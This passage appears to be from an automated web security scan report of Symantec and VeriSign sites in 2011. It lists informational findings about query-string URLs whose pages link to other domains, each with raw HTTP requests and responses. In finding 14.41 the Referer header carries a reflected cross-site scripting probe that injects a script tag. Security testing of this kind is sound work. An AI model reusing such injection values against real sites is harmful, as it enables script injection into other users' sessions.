...[SNIP]...

14.26. http://searchg.symantec.com/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://searchg.symantec.com
Path:   /search

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1 HTTP/1.1
Host: searchg.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622035736-New%7C1336358035736%3B%20event69%3Devent69%7C1336358035737%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:03 GMT
Server: saws
Cache-Control: private
Content-Type: text/html
x-content-type-options: nosniff
Vary: Accept-Encoding
Content-Length: 36924
Connection: close

<html><head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">

   <script language="javascript" type="text/javascript" src="http://www.symantec.com/lib/jsp/headerjs.jsp?lg=en
...[SNIP]...
<b><a onclick="TrackSSOB(this, 'symsugg')" href="http://community.norton.com/t5/Norton-Protection-Blog/bg-p/npb1">Norton Protection Weblog<br>
...[SNIP]...

14.27. https://securitycenter.verisign.com/celp/enroll/outsideSearch

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/outsideSearch

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /celp/enroll/outsideSearch?application_locale=VRSN_US&originator=VeriSign:CELP HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-type: text/html; charset=utf-8
Set-Cookie: JSESSIONID=OqJ5OZYQ2WaOK1XBACbZvE969n6D9cN3GA67zeaCICg9DN3y5YkW!-1800460983; path=/
Connection: close


<html>
<head>
<meta http-equiv="Content-type" content="text/html; charset=utf-8"/>
<title>


   Search for SSL or Code Signing Certificates from VeriSig
...[SNIP]...
<body aLink=#000000 bgColor=#ffffff class=bgWht leftMargin=0 link=#000000 topMargin=0 vLink=#000000 marginheight="0" marginwidth="0" onLoad="focus()">


<script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

14.28. http://shop.symantecstore.com/store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/ContentTheme/pbPage.GreenPCServiceSoftSell/ThemeID.664200?inid=us_hhobanner_norton_greenpc HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc
Content-Length: 279
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_norton_greenpc">here</a>
...[SNIP]...

14.29. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.106300/pbPage.HolidayGiftGuide09/API1=SymCom/API2=Acq?inid=us_hhobanner_nortongiftguide2008 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:39 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008
Content-Length: 284
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nortongiftguide2008">here</a>
...[SNIP]...

14.30. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1312100/pbPage.EarthDay09Norton/pgm.23674300/?inid=us_hhobanner_earth_day HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day
Content-Length: 274
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_earth_day">here</a>
...[SNIP]...

14.31. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.MacLP/pgm.47920100/?inid=us_hho_homepage_hero_mac2010lp HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:34 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp
Content-Length: 282
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_mac2010lp">here</a>
...[SNIP]...

14.32. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Norton2yrLP/pgm.29074800/?inid=us_hhobanner_2year HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_2year
Content-Length: 270
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_2year">here</a>
...[SNIP]...

14.33. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1313000/pbPage.Windows7?inid=us_hho_homepage_hero_windows7 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:35 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7
Content-Length: 281
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_windows7">here</a>
...[SNIP]...

14.34. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.2010NortonLaunch/pgm.41164400/Api1.SymCom/Api2.Acq/Api3.LP/?inid=us_hho_homepage_hero_nisnavstore2010 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:37 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010
Content-Length: 288
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnavstore2010">here</a>
...[SNIP]...

14.35. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NISNAV09EOL/pgm.33754400?inid=us_hhobanner_nisnaveol HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol
Content-Length: 274
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_nisnaveol">here</a>
...[SNIP]...

14.36. http://shop.symantecstore.com/store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/ContentTheme/ThemeID.1795800/pbPage.NUbundles/pgm.44460300/?inid=us_hho_homepage_hero_nisnustore2010 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:36 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010
Content-Length: 287
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hho_homepage_hero_nisnustore2010">here</a>
...[SNIP]...

14.37. http://shop.symantecstore.com/store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.symantecstore.com
Path:   /store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /store/symnahho/en_US/DisplayProductDetailsPage/ThemeID.106300/productID.110117300?inid=us_hhobanner_pc_powerboost_2008 HTTP/1.1
Host: shop.symantecstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 09 Sep 2011 21:46:40 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a
Location: http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008
Content-Length: 283
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://buy.norton.com/domain_migration?inid=us_hhobanner_pc_powerboost_2008">here</a>
...[SNIP]...

14.38. https://ssl-certificate-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34E1AEF0DB2D10DB645D8BD14E31479C; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank">Buy SSL Certificates &gt;&gt;</a>
...[SNIP]...
<div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html">Legal Notices</a>
...[SNIP]...
<div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html">Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html">Repository</a>
...[SNIP]...

14.39. https://ssl-certificate-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=3597AA5CDB2D10DB49F0B1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<div class="right"><a target="_blank" href="https://cert.webtrust.org/ViewSeal?id=304"><img border="0" src="/rcm/verisign/images/webtrust.gif" style="border:0" title="WebTrust" alt="WebTrust">
...[SNIP]...

14.40. http://store.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.symantec.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?inid=us_pagenotfound_smb_store HTTP/1.1
Host: store.symantec.com
Proxy-Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 09 Sep 2011 21:30:57 GMT
Content-Length: 18197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1">
<!--
...[SNIP]...
<!-- Microsoft CDN Script References -->
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.5.min.js" type="text/javascript"></script>
<script src="http://ajax.aspnetcdn.com/ajax/jquery.validate/1.7/jquery.validate.min.js"
type="text/javascript">
</script>
...[SNIP]...
<!-- Microsoft CDN CSS References -->
<link href="http://ajax.microsoft.com/ajax/jquery.ui/1.8.9/themes/cupertino/jquery-ui.css" rel="stylesheet" type="text/css" /><title>
...[SNIP]...
<!-- Microsoft CDN Script References -->
<script src="http://ajax.aspnetcdn.com/ajax/jquery.ui/1.8.9/jquery-ui.min.js" type="text/javascript"></script>
...[SNIP]...

14.41. https://symantec-corporation.com/servlet/campaignrespondent

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symantec-corporation.com
Path:   /servlet/campaignrespondent

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /servlet/campaignrespondent?_ID_=symnam.117&ACTIVITYCODE=113004 HTTP/1.1
Host: symantec-corporation.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:34:30 GMT
P3P: policyref="http://policy.responsys.net/w3c/response.xml", CP="NON DSP COR IVAi IVDi OTRi IND ONL"
Pragma: no-cache
Cache-Control: no-cache, private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 36800

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Symantec Enterprise Sales Contact Center</title>
<meta content="veritasnonconsumer" name="om.environment"
...[SNIP]...
<meta content="en/us: biz: contactcenter: form" name="om.page_name" />
<link rel="stylesheet" href="https://www-secure.symantec.com/css/20090521/symantec.css" />
<link rel="stylesheet" href="https://www-secure.symantec.com/css/20081218/business.css" /><script src="https://www-secure.symantec.com/script/omniture/om_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...
</script><script src="https://www-secure.symantec.com/specprog/onlineopinionS3t/oo_engine.js" language="javascript" type="text/javascript"></script><script src="https://www-secure.symantec.com/script/20080114/swfobject.js" language="javascript" type="text/javascript"></script><script src="https://www-secure.symantec.com/lib/jsp/headerutilsjs.jsp?lg=en&ct=us&sg=business&domain=&secure=" language="javascript" type="text/javascript"></script>
...[SNIP]...
<!-- i2a tracking code--><script type="text/javascript"
src="https://www-secure.symantec.com/scripts/icrossing/i2a.js">

</script>
...[SNIP]...
<div class="symLogo"><a href="https://www-secure.symantec.com/index.jsp"><img title="Symantec Corporation | United States" alt="Symantec Corporation" src="https://www-secure.symantec.com/images/masthead/symantec.gif" /></a>
...[SNIP]...
<span><a title="Site Map" href="https://www-secure.symantec.com/sitemap/index.jsp">Site Map</a>
...[SNIP]...
<span><a title="Legal Notices" href="https://www-secure.symantec.com/about/profile/policies/legal.jsp">Legal Notices</a>
...[SNIP]...
<span><a title="Privacy Policy" href="https://www-secure.symantec.com/about/profile/policies/privacy.jsp">Privacy Policy</a>
...[SNIP]...
<span id="item4" class="footerItemBorder"><a title="Contact Us" onMouseOver="showdiv(4)" onMouseOut="hidediv(4)" href="https://www-secure.symantec.com/feedback/contactus.jsp">Contact Us</a>
...[SNIP]...
<span><a title="Global Sites" href="https://www-secure.symantec.com/globalsites/index.jsp">Global Sites</a>
...[SNIP]...
<span><a title="License Agreements" href="https://www-secure.symantec.com/about/profile/policies/eulas/index.jsp">License Agreements</a>
...[SNIP]...
<span><a title="RSS" href="https://www-secure.symantec.com/rss/index.jsp">RSS</a>
...[SNIP]...
</p>
<script src="https://www-secure.symantec.com/script/omniture/s_code.js" language="javascript" type="text/javascript"></script>
...[SNIP]...

14.42. https://trust-center.verisign.ch/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /process/retail/console_login?application_locale=VRSN_CH HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=371EA2F4DB2D10DB68CCA5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...
</script><script type="text/javascript" src="https://www.verisign.com/js/mbox.js" language="JavaScript"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://ssl.google-analytics.com/urchin.js" language="JavaScript"></script>
...[SNIP]...
<p>To buy, renew or replace a certificate and get your VeriSign.. Trust Center sign-in, go to <a href="https://www.verisign.ch/ssl/buy-ssl-certificates/index.html" target="_blank">Buy SSL Certificates &gt;&gt;</a>
...[SNIP]...
<div class="inlineimg" style="padding-left:0px"><a target="_blank" href="https://www.verisign.ch/repository/legal-notices.html">Legal Notices</a>
...[SNIP]...
<div class="inlineimg"><a target="_blank" href="https://www.verisign.ch/repository/privacy.html">Privacy</a></div><div class="inline"><a target="_blank" href="https://www.verisign.ch/repository/index.html">Repository</a>
...[SNIP]...

14.43. https://trust-center.verisign.com/process/retail/console_login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /process/retail/console_login?application_locale=VRSN_US HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:49 GMT
Server: Apache
Set-Cookie: TLTHID=38B3ED90DB2D10DB52A19F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

